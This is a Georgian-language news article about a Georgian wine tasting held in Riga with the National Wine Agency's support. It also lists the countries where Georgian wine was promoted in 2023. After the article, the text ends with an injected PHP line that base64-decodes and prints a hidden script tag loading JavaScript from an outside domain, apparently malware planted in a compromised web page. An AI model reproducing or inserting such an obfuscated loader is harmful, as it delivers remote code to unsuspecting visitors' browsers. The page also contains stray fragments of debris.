celsiusi
ავერსი შნაიდერი
სსიპ ღვინის ეროვნული სააგენტოს მხარდაჭერით და ბალტიისპირეთის ქვეყნებში სააგენტოს კონტრაქტორი მარკეტინგული კომპანიის „TRIBE INTERNATIONAL” ორგანიზებით, ქართული ღვინის დეგუსტაცია ლატვიის დედაქალაქ რიგაში გაიმართა.
 
ღონისძიებას ღვინის იმპორტიორები, დისტრიბუტორები, ღვინის მწერლები, ჟურნალისტები, ბლოგერები და სომელიეები დაესწრნენ; საპრეზენტაციოდ წარდგენილი იყო 10-მდე დასახელების ქართული ღვინო. ბალტიისპირეთის ქვეყნები ქართული ღვინის პრიორიტეტული საექსპორტო ბაზარია, სადაც სსიპ ღვინის ეროვნული სააგენტო, ქართული ღვინის პოპულარიზაციისა და ექსპორტის ზრდის ხელშესაწყობის მიზნით აქტიურად ახორციელებს სარეკლამო- მარკეტინგული ღონისძიებებს.
 
ქალაქ რიგაში ქართული ღვინის წარდგენის ღონისძიებას საქართველოს საგანგებო და სრულუფლებიანი ელჩი ლატვიის რესპუბლიკაში ირაკლი ყურაშვილი დაესწრო.
 
ქართული ღვინის საექსპორტო ბაზრების დივერსიფიცირების მიზნით, ღვინის ეროვნული სააგენტოს ფინანსური და ორგანიზაციული მხარდაჭერით, 2023 წელს, ქართული ღვინო ამერიკის შეერთებულ შტატებში, დიდ ბრიტანეთში, გერმანიაში, პოლონეთში, ბალტიისპირეთის ქვეყნებში, ჩინეთში, სამხრეთ კორეასა და იაპონიაში აქტიურად არის წარმოდგენილი. 
499
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");